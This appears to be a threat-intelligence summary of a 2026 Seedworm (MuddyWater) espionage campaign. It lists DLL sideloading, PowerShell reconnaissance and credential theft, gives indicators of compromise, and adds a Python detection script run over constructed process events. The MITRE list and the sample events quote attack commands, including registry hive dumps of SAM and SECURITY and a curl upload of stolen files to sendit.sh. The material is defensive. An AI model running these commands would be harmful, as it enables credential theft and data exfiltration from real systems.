Seedworm: Iran-Linked Hackers Breached Korean Electronics Maker in Global Spying Campaign

Seedworm targeted at least nine organizations across four continents in early 2026, using signed DLL sideloading, Node.js-orchestrated PowerShell, and multiple credential theft tools to support espionage operations. The campaign also used public services and staging infrastructure such as sendit[.]sh and timetrakr[.]cloud while repeatedly focusing on intelligence-rich victims including a South Korean electronics manufacturer, government agencies, and financial and educational institutions. #Seedworm #MuddyWater #SentinelOne #Fortemedia #senditsh #timetrakrcloud

Keypoints

  • Seedworm, also known as MuddyWater, TEMP.Zagros, and Static Kitten, ran a broad espionage campaign in Q1 2026.
  • At least nine organizations in nine countries across four continents were affected, spanning industry, public sector, finance, and education.
  • The attackers abused legitimately signed Fortemedia fmapp.exe and SentinelOne sentinelmemoryscanner.exe binaries for DLL sideloading.
  • Node.exe appeared to orchestrate the activity, including PowerShell execution, reconnaissance, screenshot capture, and payload delivery.
  • The operators used multiple credential theft and privilege escalation tools, including SAM hive theft and a TGT extraction technique.
  • Stolen data was staged and exfiltrated through public services such as sendit[.]sh instead of fully dedicated infrastructure.
  • The campaign showed a more disciplined tradecraft pattern, mixing persistent beaconing, redundant tooling, and consumer cloud-like services.

MITRE Techniques

  • [T1574.002] Hijack Execution Flow: DLL Side-Loading – Legitimately signed executables were used to load malicious DLLs and run attacker code (‘abused to sideload a malicious DLL’).
  • [T1059.001] Command and Scripting Interpreter: PowerShell – PowerShell was used for reconnaissance, screenshot capture, payload retrieval, and repeated host checks (‘PowerShell-based reconnaissance commands’).
  • [T1059.006] Command and Scripting Interpreter: JavaScript – Node.js scripts orchestrated multiple stages of the intrusion and drove the loader chain (‘suggesting that the sideloading was orchestrated by a Node.js script’).
  • [T1027] Obfuscated Files or Information – Encoded blobs and randomly named directories were used to stage payloads and hide activity (‘a.dat is believed to be an encoded payload’).
  • [T1119] Automated Collection – A script appears to have captured screenshots from the victim host (‘appears to have captured a screenshot of the user’s primary display’).
  • [T1082] System Information Discovery – The attackers enumerated host details, users, groups, and network settings (‘whoami /all’, ‘hostname’, ‘ipconfig /all’).
  • [T1087.002] Account Discovery: Domain Account – Domain users and groups were enumerated to map the environment (‘net user /domain’, ‘net group [REMOVED] /domain’).
  • [T1518.001] Software Discovery: Security Software Discovery – WMI was used to identify installed antivirus products (‘enumerate antivirus products registered with the Security Center’).
  • [T1110] Brute Force – Not directly observed; credentials were instead obtained through prompts and hive theft, so the reporting does not support direct brute-force use.
  • [T1003.004] OS Credential Dumping: LSA Secrets – The attackers saved SECURITY and SYSTEM hives to extract cached secrets and credentials (‘reg save hklm\security …’, ‘reg save hklm\system …’).
  • [T1003.002] OS Credential Dumping: Security Account Manager – The SAM hive was saved for offline hash extraction (‘reg save hklm\sam C:\Windows\Temp\sam.save’).
  • [T1003.001] OS Credential Dumping: LSASS Memory – The activity aimed to obtain elevated credentials and likely reach LSASS (‘seeking SYSTEM privileges in order to reach LSASS’).
  • [T1056.002] Input Capture: GUI Input Capture – A credential harvester invoked the Windows credentials prompt to capture entered passwords (‘calls CredUIPromptForWindowsCredentialsW’).
  • [T1068] Exploitation for Privilege Escalation – A dedicated tool attempted privilege escalation by abusing Kerberos/GSS-API delegation (‘automates Kerberos Ticket Granting Ticket extraction’).
  • [T1550.003] Use Alternate Authentication Material: Pass the Ticket – A TGT was extracted from a high-privilege user for later use (‘obtain a usable TGT from a high-privilege user’).
  • [T1090.001] Proxy: Internal Proxy – SOCKS5 reverse-proxy tunnelling was used to relay traffic through the victim host (‘SOCKS5 reverse-proxy tunnelling’).
  • [T1219] Remote Access Software – The attackers relied on public file-transfer and staging services to move data (‘staged stolen data through sendit[.]sh’).
  • [T1041] Exfiltration Over C2 Channel – Stolen data was transferred out via HTTPS to a public file-transfer service (‘curl.exe -F "file=@C:\Windows\Temp" https://sendit.sh’).
  • [T1105] Ingress Tool Transfer – Additional scripts and payloads were downloaded from attacker-controlled infrastructure (‘pulling a PowerShell payload from an attacker-controlled staging server’).

Indicators of Compromise

  • [File hashes] Malicious binaries and tools used for sideloading, credential theft, and privilege escalation – e25892603c42e34bd7ba0d8ea73be600d898cadc290e3417a82c04d6281b743b, c6182fd01b14d84723e3c9d11bc0e16b34de6607ccb8334fc9bb97c1b44f0cde, and 6 other hashes
  • [IP addresses] Attacker staging servers and related network infrastructure – 179.43.177[.]220, 178.128.233[.]36, and 4 other IPs
  • [Domains] Attacker-controlled or abused services used for staging and exfiltration – timetrakr[.]cloud, sendit[.]sh, and svc.wompworthy[.]com
  • [URLs] Payload and reconnaissance endpoints contacted by the implant – http://179.43.177[.]220:8080/nm.ps1, http://ipinfo[.]io/json, and 3 other URLs
  • [File names] Dropped and sideloaded components used in the intrusion – fmapp.exe, fmapp.dll, sentinelmemoryscanner.exe, and sentinelagentcore.dll
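As an added defensive example (not code from the report or from the vendors named in it), the following Python sketch turns several of the techniques and file names above into detection rules and runs them over constructed Sysmon-style process-creation and image-load events; the staging directory, the event field layout and the trusted-path list are assumptions made for the example.

```python
import re
# Signed host binaries named in the report and the DLLs sideloaded next to them.
SIDELOAD_HOSTS = {"fmapp.exe": "fmapp.dll", "sentinelmemoryscanner.exe": "sentinelagentcore.dll"}
# Where such vendor binaries are expected to live (assumption made for this example).
TRUSTED_DIRS = ("c:\\program files\\", "c:\\program files (x86)\\", "c:\\windows\\system32\\")
HIVE_RE = re.compile(r"\breg(?:\.exe)?\s+save\s+hklm\\(sam|security|system)\b", re.I)
EXFIL_RE = re.compile(r"\bcurl(?:\.exe)?\b.*-F\s+.?file=@.*sendit\.sh", re.I)

def classify(ev):
    """Return the rule names matched by one Sysmon-style event dict (ID 1 / ID 7 fields)."""
    hits = []
    image = ev.get("Image", "").lower()
    name = image.rsplit("\\", 1)[-1]
    cmd = ev.get("CommandLine", "")
    loaded = ev.get("ImageLoaded", "").lower()
    # T1059.006 -> T1059.001: node.exe orchestrating PowerShell
    if ev.get("ParentImage", "").lower().endswith("\\node.exe") and name == "powershell.exe":
        hits.append("node-spawns-powershell")
    # T1574.002: signed host binary running outside its expected install directory ...
    if name in SIDELOAD_HOSTS and not image.startswith(TRUSTED_DIRS):
        hits.append(f"sideload-host-untrusted-path:{name}")
    # ... or loading its companion DLL from an untrusted directory (image-load event)
    if name in SIDELOAD_HOSTS and loaded.endswith("\\" + SIDELOAD_HOSTS[name]) and not loaded.startswith(TRUSTED_DIRS):
        hits.append(f"dll-sideload:{SIDELOAD_HOSTS[name]}")
    # T1003.002 / T1003.004: hive export for offline credential extraction
    if (m := HIVE_RE.search(cmd)):
        hits.append(f"reg-save-hive:{m.group(1).lower()}")
    # T1041: curl multipart upload to the public file-drop service
    if EXFIL_RE.search(cmd):
        hits.append("curl-upload-sendit.sh")
    return hits

def scan(events):
    """Map event index -> matched rules, for every event that fires at least one rule."""
    return {i: h for i, ev in enumerate(events) if (h := classify(ev))}

# Constructed sample telemetry (not from the report); STAGE stands in for the randomly named staging directory.
STAGE = r"C:\ProgramData\x7q2k"
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": STAGE + r"\node.exe", "CommandLine": "powershell -c whoami /all"},
    {"Image": STAGE + r"\fmapp.exe", "ParentImage": STAGE + r"\node.exe",
     "CommandLine": "fmapp.exe", "ImageLoaded": STAGE + r"\fmapp.dll"},
    {"Image": r"C:\Windows\System32\reg.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"reg save hklm\sam C:\Windows\Temp\sam.save"},
    {"Image": r"C:\Windows\System32\curl.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'curl.exe -F "file=@C:\Windows\Temp\sam.save" https://sendit.sh'},
    {"Image": r"C:\Program Files\Fortemedia\fmapp.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "fmapp.exe"},  # benign: vendor binary in its install directory
]
```

Running `scan(SAMPLE_EVENTS)` flags the first four events and leaves the benign vendor-path launch unflagged; the rules are deliberately narrow to the reported file names and commands and should be widened against local telemetry before production use.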

Read more: https://www.security.com/threat-intelligence/iran-seedworm-electronics